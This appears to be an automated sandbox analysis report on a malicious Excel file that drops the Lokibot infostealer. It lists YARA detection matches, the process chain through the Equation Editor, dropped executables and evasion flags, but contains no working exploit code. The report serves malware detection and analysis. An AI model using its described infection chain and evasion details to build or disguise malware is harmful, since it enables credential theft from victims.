              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_00403225
              Source: C:\Users\Public\vbc.exeCode function: 4_2_0040604C4_2_0040604C
              Source: C:\Users\Public\vbc.exeCode function: 4_2_004047724_2_00404772
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA95_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B50C25_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B68A15_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B50C25_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B56345_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B786D5_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B39AC5_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B56345_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B4B505_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008B4B505_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_001209FB5_2_001209FB
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040549C6_2_0040549C
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_004029D46_2_004029D4
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B50C26_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B68A16_2_008B68A1
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B50C26_2_008B50C2
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B56346_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B786D6_2_008B786D
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B39AC6_2_008B39AC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B56346_2_008B5634
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AEFA96_2_008AEFA9
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B4B506_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008B4B506_2_008B4B50
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 008AFF50 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: String function: 00405B6F appears 42 times
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\xmtxpy.exe DE398BE02D5ABE9C8BCE84380AC5303EA00FC00820A50CAD007220F24538B3DE
              Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxVirustotal: Detection: 35%
              Source: _2201S_BUSAN_HOCHIMINH_.xlsxReversingLabs: Detection: 32%
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
              Source: C:\Users\Public\vbc.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzdJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess created: C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzdJump to behavior
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,6_2_0040650A
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$_2201S_BUSAN_HOCHIMINH_.xlsxJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD613.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@8/27@81/3
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,4_2_00402012
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_00404275
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: wntdll.pdb source: xmtxpy.exe, 00000005.00000003.463241268.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, xmtxpy.exe, 00000005.00000003.461526742.00000000023E0000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: xmtxpy.exe PID: 2556, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AFF95 push ecx; ret 5_2_008AFFA8
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AD4
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_00402AC0 push eax; ret 6_2_00402AFC
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 6_2_008AFF95 push ecx; ret 6_2_008AFFA8
              Source: C:\Users\Public\vbc.exeCode function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,4_2_00405DA3
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exeJump to dropped file
              Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\xmtxpy.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeFile created: C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)Jump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

              Boot Survival

              barindex
              Drops PE files to the user root directory
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeCode function: 5_2_008AEFA9 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_008AEFA9
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
